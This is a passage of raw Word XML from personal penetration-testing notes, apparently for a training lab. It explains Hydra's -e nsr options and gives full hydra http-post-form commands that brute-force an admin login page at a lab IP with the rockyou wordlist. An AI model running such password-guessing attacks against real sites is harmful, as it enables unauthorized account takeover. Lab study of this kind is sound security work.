      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nsr</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ftp://192.168.237.148</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001279">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-e nsr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000127A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">additional checks</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> option. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-e </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stands for "try empty password / username as password / reverse login."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000127B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The letters after it tell Hydra which extra guesses to include. Specifically:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000127C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">n</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → try null/empty password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000127D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">s</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → try login name as password (so: michael:michael)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000127E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">r </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ try reversed login name as password (so: michael:leahcim)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000127F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001280">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001281">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8clcoxkga83c" w:id="153"/>
      <w:bookmarkEnd w:id="153"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bruteforce Websites using Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001282">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001283">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is an example I tested on</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> .249 on Relia Challenge Lab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001284">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="873"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2324100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="174" name="image178.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image178.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId356"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2324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285">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="873"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First thing to do is intercept the request on burpsuite so that you know the parameters used to login, as well as any login failure hints in the Post Response (which we can see is "login_failed"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001286">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="873"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also look at the first line to make sure it's actually /cms/admin.php since sometimes the URL is different in the POST request than on firefox. In the case they are different, go with the one in POST request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001287">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="873"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then we can try logging in randomly to see if there is a failure message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001288">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="873"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3164850" cy="2576513"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="83" name="image80.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image80.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId357"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3164850" cy="2576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289">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="873"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we see "User unknown or password wrong"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000128A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="873"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, now we have the parameters of the post request and two failure messages to try (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"login_failed"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"User unknown or password wrong"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000128B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="873"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And also the target page was:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000128C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="873"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.118.249</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:8000/cms/admin.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000128D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="873"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The payloads are:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000128E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="873"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -l admin -P </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e nsr 192.168.118.249 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-s 8000</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> http-post-form "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/cms/admin.php:username</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">=^USER^&amp;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">userpw</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">=^PASS^:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">login_failed</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000128F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="873"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-s 8000 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">specified port 8000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001290">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="873"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">username</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" and "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">userpw</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" with your own parameters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001291">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="873"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">login_failed</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" with your own error message</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001292">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="873"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -l admin -P /usr/share/wordlists/rockyou.txt -e nsr 192.168.118.249 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-s 8000</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> http-post-form "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/cms/admin.php:username</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">=^USER^&amp;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">userpw</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">=^PASS^:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">User unknown or password wrong</w:t>
      </w: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1293">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="873"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Same as the one above but with different error message that also worked since it showed up on the page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001294">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="873"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001295">
      <w:pPr>
        <w:ind w:left="0" w:hanging="1440"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7824192" cy="1604963"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="508" name="image497.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image497.png"/>
